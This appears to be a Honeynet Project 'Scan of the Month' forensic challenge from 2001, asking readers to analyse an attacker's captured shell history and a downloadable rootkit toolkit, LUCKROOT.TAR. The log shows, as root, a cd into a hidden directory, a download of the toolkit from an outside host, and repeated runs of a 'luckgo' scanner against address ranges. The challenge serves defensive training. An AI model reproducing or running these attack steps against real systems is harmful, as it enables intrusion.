#
# SCAN OF THE MONTH #13:  March, 2001
#
# Challenge to see who can determine which tool was used 
# and the purpose of this attack.  
#
# The packets were captured from the wild as part of the 
# Honeynet Project, http://project.honeynet.org

In the past two months, the Honeynet Project has identified
a great deal of aggressive activity from members of the Romanian
blackhat community.  On 5 Jan, 2001 a Linux honeypot was 
compromised by one of these members.  On 8 Jan, 2001,  the attackers 
keystrokes were captured and forwarded to a secured syslog server.  
Your job is to analyze these keystrokes and the tool LUCKROOT.TAR.  
Based on your research, you should be prepared to answer the questions 
set forth by the challenge.

You can download LUCKROOT.TAR from the URL below.  
WARNING: you will be analyzing a toolkit captured in the wild,
this tool set was created by the blackhat community for 
mailicious purposes.  Only use a system dedicated for such
analysis.  Do not run this toolset while connected to a network.
You have been warned :)

    http://project.honeynet.org/scans/scan13/LUCKROOT.TAR
 
      

Jan 8 18:47:52 honeypot -bash: HISTORY: PID=1246 UID=0 cd .mail
Jan 8 18:48:00 honeypot -bash: HISTORY: PID=1246 UID=0 cd /usr/sbin/.mail
Jan 8 18:48:12 honeypot -bash: HISTORY: PID=1246 UID=0 lynx www.becys.org/LUCKROOT.TAR
Jan 8 18:48:31 honeypot -bash: HISTORY: PID=1246 UID=0 y
Jan 8 18:48:45 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xvfz LUCKROOT.TAR 
Jan 8 18:48:59 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xzvf Lu
Jan 8 18:49:01 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xzvf L
Jan 8 18:49:03 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xzvf LUCKROOT.TAR 
Jan 8 18:49:06 honeypot -bash: HISTORY: PID=1246 UID=0 cd luckroot
Jan 8 18:49:13 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 210
Jan 8 18:51:07 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 200 120
Jan 8 18:51:43 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 64 120
Jan 8 18:52:00 honeypot -bash: HISTORY: PID=1246 UID=0 .luckgo 216 200
Jan 8 18:52:06 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 200
Jan 8 18:54:37 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 200 120
Jan 8 18:55:26 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 63 1
Jan 8 18:56:06 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 10
Jan 8 19:06:04 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 210 120
Jan 8 19:07:03 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 64 1
Jan 8 19:07:34 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 1
Jan 8 19:09:41 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 194 1
Jan 8 19:10:53 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 1
Jan 8 19:12:13 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 210 128
Jan 8 19:23:30 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 24 1
Jan 8 19:35:55 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 12 20